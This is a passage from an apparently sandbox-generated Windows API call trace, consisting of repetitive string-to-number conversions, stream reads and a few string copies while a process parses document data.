atoi (_Str="474") returned 474 [0059.359] VarI4FromStr (in: strIn="1995015950", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.359] atoi (_Str="820") returned 820 [0059.359] atoi (_Str="843") returned 843 [0059.360] VarI4FromStr (in: strIn="1995015950", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.360] atoi (_Str="94") returned 94 [0059.360] atoi (_Str="60") returned 60 [0059.361] atoi (_Str="2481") returned 2481 [0059.361] atoi (_Str="2470") returned 2470 [0059.361] VarR8FromStr (in: strIn="64443.68883426", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.361] VarR4FromR8 (in: dblIn=0xaee2562, pfltOut=0x40ef7776 | out: pfltOut=0x40ef7776) returned 0x0 [0059.361] atoi (_Str="1117") returned 1117 [0059.361] atoi (_Str="5085") returned 5085 [0059.361] atoi (_Str="45") returned 45 [0059.362] atoi (_Str="2481") returned 2481 [0059.362] atoi (_Str="2470") returned 2470 [0059.362] VarR8FromStr (in: strIn="26662.390286686", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.362] VarR4FromR8 (in: dblIn=0xfa75021c, pfltOut=0x40da0998 | out: pfltOut=0x40da0998) returned 0x0 [0059.362] atoi (_Str="94") returned 94 [0059.362] atoi (_Str="60") returned 60 [0059.363] atoi (_Str="2481") returned 2481 [0059.363] atoi (_Str="2470") returned 2470 [0059.363] VarR8FromStr (in: strIn="52559.489816187", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.363] VarR4FromR8 (in: dblIn=0xac92ff07, pfltOut=0x40e9a9ef | out: pfltOut=0x40e9a9ef) returned 0x0 [0059.363] atoi (_Str="232") returned 232 [0059.363] atoi (_Str="75") returned 75 [0059.363] atoi (_Str="1935") returned 1935 [0059.363] atoi (_Str="1946") returned 1946 [0059.364] VarR8FromStr (in: strIn="61102.882909108", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.364] VarR4FromR8 (in: dblIn=0x40ca9a06, pfltOut=0x40edd5dc | out: pfltOut=0x40edd5dc) returned 0x0 [0059.364] atoi (_Str="840") returned 840 [0059.364] atoi (_Str="806") returned 806 [0059.364] atoi (_Str="1935") returned 1935 [0059.365] atoi (_Str="1946") returned 1946 [0059.365] VarI4FromStr (in: strIn="32742", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.365] atoi (_Str="888") returned 888 [0059.365] atoi (_Str="917") returned 917 [0059.365] atoi (_Str="77") returned 77 [0059.365] atoi (_Str="202") returned 202 [0059.365] atoi (_Str="260") returned 260 [0059.365] CRetailMalloc_Realloc () returned 0x7757f48 [0059.366] VarR8FromStr (in: strIn="12810.581132587", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.366] VarR4FromR8 (in: dblIn=0x628d77e7, pfltOut=0x40c9054a | out: pfltOut=0x40c9054a) returned 0x0 [0059.366] atoi (_Str="840") returned 840 [0059.366] atoi (_Str="806") returned 806 [0059.366] atoi (_Str="1935") returned 1935 [0059.366] atoi (_Str="1946") returned 1946 [0059.367] VarR8FromStr (in: strIn="49749.285061972", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.367] VarR4FromR8 (in: dblIn=0x1f3a48e2, pfltOut=0x40e84aa9 | out: pfltOut=0x40e84aa9) returned 0x0 [0059.367] atoi (_Str="840") returned 840 [0059.367] atoi (_Str="806") returned 806 [0059.367] atoi (_Str="1935") returned 1935 [0059.367] atoi (_Str="1946") returned 1946 [0059.367] atoi (_Str="218") returned 218 [0059.367] atoi (_Str="888") returned 888 [0059.367] atoi (_Str="917") returned 917 [0059.368] VarI4FromStr (in: strIn="15949704", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.368] atoi (_Str="840") returned 840 [0059.368] atoi (_Str="806") returned 806 [0059.368] atoi (_Str="1935") returned 1935 [0059.368] atoi (_Str="1946") returned 1946 [0059.369] CRetailMalloc_Realloc () returned 0x8750140 [0059.373] atoi (_Str="914") returned 914 [0059.373] atoi (_Str="19") returned 19 [0059.373] atoi (_Str="8778") returned 8778 [0059.373] atoi (_Str="798") returned 798 [0059.373] atoi (_Str="666") returned 666 [0059.373] atoi (_Str="697") returned 697 [0059.374] VarR8FromStr (in: strIn="24218.260065152", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.374] VarR4FromR8 (in: dblIn=0xa4e84eab, pfltOut=0x40d7a690 | out: pfltOut=0x40d7a690) returned 0x0 [0059.374] VarR8FromStr (in: strIn="20087.127280367", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.374] VarR4FromR8 (in: dblIn=0x255c8d6c, pfltOut=0x40d39dc8 | out: pfltOut=0x40d39dc8) returned 0x0 [0059.374] atoi (_Str="914") returned 914 [0059.374] atoi (_Str="19") returned 19 [0059.375] atoi (_Str="8778") returned 8778 [0059.375] atoi (_Str="798") returned 798 [0059.375] VarR8FromStr (in: strIn="64399.879198824", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.375] VarR4FromR8 (in: dblIn=0x22659278, pfltOut=0x40ef71fc | out: pfltOut=0x40ef71fc) returned 0x0 [0059.375] atoi (_Str="7755") returned 7755 [0059.375] atoi (_Str="165") returned 165 [0059.376] atoi (_Str="8778") returned 8778 [0059.376] atoi (_Str="798") returned 798 [0059.376] atoi (_Str="155") returned 155 [0059.376] atoi (_Str="666") returned 666 [0059.376] atoi (_Str="697") returned 697 [0059.376] VarR8FromStr (in: strIn="35180.921575678", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.376] VarR4FromR8 (in: dblIn=0x7d8c46ba, pfltOut=0x40e12d9d | out: pfltOut=0x40e12d9d) returned 0x0 [0059.376] VarI4FromStr (in: strIn="24700", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.376] atoi (_Str="494") returned 494 [0059.376] VarR8FromStr (in: strIn="35180.921575678", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.376] VarR4FromR8 (in: dblIn=0x7d8c46ba, pfltOut=0x40e12d9d | out: pfltOut=0x40e12d9d) returned 0x0 [0059.376] atoi (_Str="914") returned 914 [0059.377] atoi (_Str="19") returned 19 [0059.377] atoi (_Str="8778") returned 8778 [0059.377] atoi (_Str="798") returned 798 [0059.377] VarR8FromStr (in: strIn="10755.854800301", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.379] VarR4FromR8 (in: dblIn=0x6a18a4b4, pfltOut=0x40c501ed | out: pfltOut=0x40c501ed) returned 0x0 [0059.379] VarR8FromStr (in: strIn="10755.854800301", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.379] VarR4FromR8 (in: dblIn=0x6a18a4b4, pfltOut=0x40c501ed | out: pfltOut=0x40c501ed) returned 0x0 [0059.379] atoi (_Str="7755") returned 7755 [0059.379] atoi (_Str="165") returned 165 [0059.379] atoi (_Str="8778") returned 8778 [0059.379] atoi (_Str="798") returned 798 [0059.379] atoi (_Str="666") returned 666 [0059.379] atoi (_Str="697") returned 697 [0059.380] VarI4FromStr (in: strIn="24700", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.380] atoi (_Str="494") returned 494 [0059.380] VarI4FromStr (in: strIn="31785", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.380] atoi (_Str="122") returned 122 [0059.380] atoi (_Str="205") returned 205 [0059.380] atoi (_Str="1155") returned 1155 [0059.380] atoi (_Str="1141") returned 1141 [0059.380] VarI4FromStr (in: strIn="19648", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.380] VarI4FromStr (in: strIn="767376354", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.380] VarI4FromStr (in: strIn="19648", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.380] VarR8FromStr (in: strIn="1838.459896764", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.381] VarR4FromR8 (in: dblIn=0xef2d63aa, pfltOut=0x409cb9d6 | out: pfltOut=0x409cb9d6) returned 0x0 [0059.381] VarI4FromStr (in: strIn="19648", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.381] VarR8FromStr (in: strIn="24992.424573309", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.381] VarR4FromR8 (in: dblIn=0x2c35873a, pfltOut=0x40d8681b | out: pfltOut=0x40d8681b) returned 0x0 [0059.381] VarR8FromStr (in: strIn="14561.798019254", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.381] VarR4FromR8 (in: dblIn=0x257eb2c1, pfltOut=0x40cc70e6 | out: pfltOut=0x40cc70e6) returned 0x0 [0059.381] VarR8FromStr (in: strIn="60603.114245832", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.381] VarR4FromR8 (in: dblIn=0xa7e6e005, pfltOut=0x40ed9763 | out: pfltOut=0x40ed9763) returned 0x0 [0059.381] VarI4FromStr (in: strIn="19124", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.381] VarI4FromStr (in: strIn="19125", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.382] VarI4FromStr (in: strIn="30258", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.382] VarR8FromStr (in: strIn="9910.4685071046", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.382] VarR4FromR8 (in: dblIn=0xf80a721a, pfltOut=0x40c35b3b | out: pfltOut=0x40c35b3b) returned 0x0 [0059.382] CExposedStream::Read () returned 0x0 [0059.382] CExposedStream::Read () returned 0x0 [0059.382] VarI4FromStr (in: strIn="19124", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.382] VarI4FromStr (in: strIn="19125", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.382] VarI4FromStr (in: strIn="19124", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.382] VarI4FromStr (in: strIn="19125", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.382] VarI4FromStr (in: strIn="26439", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.382] VarR8FromStr (in: strIn="33636.259587249", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.383] VarR4FromR8 (in: dblIn=0x4e89eb1d, pfltOut=0x40e06c88 | out: pfltOut=0x40e06c88) returned 0x0 [0059.383] VarR8FromStr (in: strIn="36947.099385587", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.383] VarR4FromR8 (in: dblIn=0x2e2aaebb, pfltOut=0x40e20a63 | out: pfltOut=0x40e20a63) returned 0x0 [0059.383] VarI4FromStr (in: strIn="982209492", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.383] VarR8FromStr (in: strIn="61010.177778202", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.383] VarR4FromR8 (in: dblIn=0xb05be971, pfltOut=0x40edca45 | out: pfltOut=0x40edca45) returned 0x0 [0059.383] strcpy_s (in: _Dst=0x75060958, _DstSize=0x100, _Src="iPad" | out: _Dst="iPad") returned 0x0 [0059.383] VarI4FromStr (in: strIn="11939", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.383] VarR8FromStr (in: strIn="30612.467082935", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.383] VarR4FromR8 (in: dblIn=0xe4afd296, pfltOut=0x40dde51d | out: pfltOut=0x40dde51d) returned 0x0 [0059.384] VarI4FromStr (in: strIn="17712", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.384] VarR8FromStr (in: strIn="12978.716450007", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.384] VarR4FromR8 (in: dblIn=0xb4a242a4, pfltOut=0x40c9595b | out: pfltOut=0x40c9595b) returned 0x0 [0059.384] VarI4FromStr (in: strIn="17558", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.384] VarI4FromStr (in: strIn="17558", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.384] VarI4FromStr (in: strIn="17712", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.384] VarR8FromStr (in: strIn="62711.332744294", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.384] VarR4FromR8 (in: dblIn=0xa5d75c95, pfltOut=0x40ee9eea | out: pfltOut=0x40ee9eea) returned 0x0 [0059.384] VarI4FromStr (in: strIn="28462", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.384] VarI4FromStr (in: strIn="15360", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.385] VarI4FromStr (in: strIn="28462", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.385] VarR8FromStr (in: strIn="43372.443502339", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.385] VarR4FromR8 (in: dblIn=0x312bd137, pfltOut=0x40e52d8e | out: pfltOut=0x40e52d8e) returned 0x0 [0059.385] VarI4FromStr (in: strIn="20746", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.385] VarR8FromStr (in: strIn="43372.443502339", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.385] VarR4FromR8 (in: dblIn=0x312bd137, pfltOut=0x40e52d8e | out: pfltOut=0x40e52d8e) returned 0x0 [0059.385] VarI4FromStr (in: strIn="28462", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.385] VarI4FromStr (in: strIn="1255302680", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.385] VarI4FromStr (in: strIn="30828", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.385] VarI4FromStr (in: strIn="18674", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.385] VarI4FromStr (in: strIn="1050054640", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.386] VarI4FromStr (in: strIn="31124", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.386] VarI4FromStr (in: strIn="30828", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.386] VarR8FromStr (in: strIn="40955.922479409", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.386] VarR4FromR8 (in: dblIn=0x84f3899c, pfltOut=0x40e3ff7d | out: pfltOut=0x40e3ff7d) returned 0x0 [0059.386] VarI4FromStr (in: strIn="30828", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.386] VarI4FromStr (in: strIn="13433", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.386] strcpy_s (in: _Dst=0x75060958, _DstSize=0x100, _Src="iPad" | out: _Dst="iPad") returned 0x0 [0059.386] VarI4FromStr (in: strIn="12064", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.386] VarI4FromStr (in: strIn="12064", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.386] VarI4FromStr (in: strIn="12064", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.386] VarI4FromStr (in: strIn="12064", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.387] VarI4FromStr (in: strIn="1695747648", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.387] VarI4FromStr (in: strIn="12064", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.387] VarI4FromStr (in: strIn="12064", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.387] VarR8FromStr (in: strIn="27584.32668342", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.387] VarR4FromR8 (in: dblIn=0xe8619343, pfltOut=0x40daf014 | out: pfltOut=0x40daf014) returned 0x0 [0059.387] VarI4FromStr (in: strIn="12064", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.387] VarI4FromStr (in: strIn="12064", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.387] VarI4FromStr (in: strIn="12064", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.387] VarI4FromStr (in: strIn="12064", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.387] VarI4FromStr (in: strIn="233633268", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.388] VarI4FromStr (in: strIn="23616", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.388] VarI4FromStr (in: strIn="19856", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.388] VarI4FromStr (in: strIn="13832", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.388] VarR8FromStr (in: strIn="19159.429924019", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.388] VarR4FromR8 (in: dblIn=0x83e00858, pfltOut=0x40d2b5db | out: pfltOut=0x40d2b5db) returned 0x0 [0059.388] VarR8FromStr (in: strIn="47503.319058375", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.388] VarR4FromR8 (in: dblIn=0x35b9e8c4, pfltOut=0x40e731ea | out: pfltOut=0x40e731ea) returned 0x0 [0059.388] VarI4FromStr (in: strIn="13832", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.388] VarI4FromStr (in: strIn="32558", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.388] VarI4FromStr (in: strIn="1181874216", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.388] CRetailMalloc_Realloc () returned 0x8889550 [0059.390] atoi (_Str="1000") returned 1000 [0059.390] atoi (_Str="11") returned 11 [0059.390] atoi (_Str="850") returned 850 [0059.391] atoi (_Str="840") returned 840 [0059.391] atoi (_Str="107") returned 107 [0059.391] CExposedStream::Read () returned 0x0 [0059.391] CExposedStream::Read () returned 0x0 [0059.391] atoi (_Str="1000") returned 1000 [0059.391] atoi (_Str="11") returned 11 [0059.392] atoi (_Str="850") returned 850 [0059.392] atoi (_Str="840") returned 840 [0059.392] VarR8FromStr (in: strIn="11024.792751021", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.392] VarR4FromR8 (in: dblIn=0x78dd8e88, pfltOut=0x40c58865 | out: pfltOut=0x40c58865) returned 0x0 [0059.392] atoi (_Str="578") returned 578 [0059.392] atoi (_Str="559") returned 559 [0059.392] VarI4FromStr (in: strIn="1209749588", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.393] VarR8FromStr (in: strIn="11024.792751021", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.393] VarR4FromR8 (in: dblIn=0x78dd8e88, pfltOut=0x40c58865 | out: pfltOut=0x40c58865) returned 0x0 [0059.393] strcpy_s (in: _Dst=0x75060420, _DstSize=0x100, _Src="EwqPK5Nx" | out: _Dst="EwqPK5Nx") returned 0x0 [0059.393] atoi (_Str="0") returned 0 [0059.393] atoi (_Str="255") returned 255 [0059.394] atoi (_Str="65") returned 65 [0059.396] atoi (_Str="90") returned 90 [0059.396] atoi (_Str="291") returned 291 [0059.396] atoi (_Str="345") returned 345 [0059.397] atoi (_Str="1914") returned 1914 [0059.397] atoi (_Str="1922") returned 1922 [0059.397] VarR8FromStr (in: strIn="25809.449848298", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.397] VarR4FromR8 (in: dblIn=0xca508405, pfltOut=0x40d9345c | out: pfltOut=0x40d9345c) returned 0x0 [0059.397] atoi (_Str="684") returned 684 [0059.397] atoi (_Str="663") returned 663 [0059.397] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Private", cchCount1=-1, lpString2="l1u8gi", cchCount2=-1) returned 3 [0059.398] VarR8FromStr (in: strIn="25809.449848298", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.398] VarR4FromR8 (in: dblIn=0xca508405, pfltOut=0x40d9345c | out: pfltOut=0x40d9345c) returned 0x0 [0059.398] atoi (_Str="184") returned 184 [0059.398] atoi (_Str="230") returned 230 [0059.398] atoi (_Str="214") returned 214 [0059.398] atoi (_Str="952") returned 952 [0059.398] atoi (_Str="970") returned 970 [0059.398] atoi (_Str="1914") returned 1914 [0059.398] atoi (_Str="1922") returned 1922 [0059.399] atoi (_Str="201") returned 201 [0059.399] atoi (_Str="684") returned 684 [0059.399] atoi (_Str="663") returned 663 [0059.399] atoi (_Str="201") returned 201 [0059.399] atoi (_Str="0") returned 0 [0059.399] atoi (_Str="952") returned 952 [0059.400] atoi (_Str="970") returned 970 [0059.400] atoi (_Str="1914") returned 1914 [0059.400] atoi (_Str="1922") returned 1922 [0059.400] atoi (_Str="291") returned 291 [0059.400] atoi (_Str="345") returned 345 [0059.401] atoi (_Str="1914") returned 1914 [0059.401] atoi (_Str="1922") returned 1922 [0059.401] atoi (_Str="83") returned 83 [0059.401] atoi (_Str="952") returned 952 [0059.401] atoi (_Str="970") returned 970 [0059.401] atoi (_Str="1914") returned 1914 [0059.401] atoi (_Str="1922") returned 1922 [0059.401] VarI4FromStr (in: strIn="29980", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.402] VarR8FromStr (in: strIn="23674.058027161", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.402] VarR4FromR8 (in: dblIn=0xb6b78db2, pfltOut=0x40d71e83 | out: pfltOut=0x40d71e83) returned 0x0 [0059.402] atoi (_Str="848") returned 848 [0059.402] atoi (_Str="810") returned 810 [0059.402] atoi (_Str="1220") returned 1220 [0059.402] atoi (_Str="1211") returned 1211 [0059.403] atoi (_Str="216") returned 216 [0059.403] atoi (_Str="848") returned 848 [0059.403] atoi (_Str="810") returned 810 [0059.404] atoi (_Str="1220") returned 1220 [0059.404] atoi (_Str="1211") returned 1211 [0059.404] VarR8FromStr (in: strIn="41401.310074032", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.404] VarR4FromR8 (in: dblIn=0xec206059, pfltOut=0x40e43729 | out: pfltOut=0x40e43729) returned 0x0 [0059.404] atoi (_Str="848") returned 848 [0059.404] atoi (_Str="810") returned 810 [0059.404] atoi (_Str="1220") returned 1220 [0059.404] atoi (_Str="1211") returned 1211 [0059.405] VarR8FromStr (in: strIn="40677.64693288", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.405] VarR4FromR8 (in: dblIn=0xb3ac954a, pfltOut=0x40e3dcb4 | out: pfltOut=0x40e3dcb4) returned 0x0 [0059.405] atoi (_Str="215") returned 215 [0059.405] atoi (_Str="189") returned 189 [0059.405] VarR8FromStr (in: strIn="40677.64693288", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.405] VarR4FromR8 (in: dblIn=0xb3ac954a, pfltOut=0x40e3dcb4 | out: pfltOut=0x40e3dcb4) returned 0x0 [0059.405] atoi (_Str="180") returned 180 [0059.405] atoi (_Str="120") returned 120 [0059.406] VarI4FromStr (in: strIn="27468", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.406] atoi (_Str="335") returned 335 [0059.406] atoi (_Str="35") returned 35 [0059.406] VarI4FromStr (in: strIn="27966", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.406] VarI4FromStr (in: strIn="27967", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.407] atoi (_Str="1284") returned 1284 [0059.407] atoi (_Str="1305") returned 1305 [0059.407] VarI4FromStr (in: strIn="27860", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.408] VarR8FromStr (in: strIn="35091.894519852", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.408] VarR4FromR8 (in: dblIn=0x9fe818bf, pfltOut=0x40e1227c | out: pfltOut=0x40e1227c) returned 0x0 [0059.408] atoi (_Str="335") returned 335 [0059.409] atoi (_Str="35") returned 35 [0059.409] VarI4FromStr (in: strIn="27966", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.411] VarI4FromStr (in: strIn="27967", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.411] VarR8FromStr (in: strIn="50525.954445305", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.411] VarR4FromR8 (in: dblIn=0x8ad0e159, pfltOut=0x40e8abbe | out: pfltOut=0x40e8abbe) returned 0x0 [0059.412] atoi (_Str="335") returned 335 [0059.412] atoi (_Str="35") returned 35 [0059.412] VarI4FromStr (in: strIn="27966", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.412] VarI4FromStr (in: strIn="27967", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.412] VarR8FromStr (in: strIn="20429.208037891", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.412] VarR4FromR8 (in: dblIn=0x507e288b, pfltOut=0x40d3f34d | out: pfltOut=0x40d3f34d) returned 0x0 [0059.413] atoi 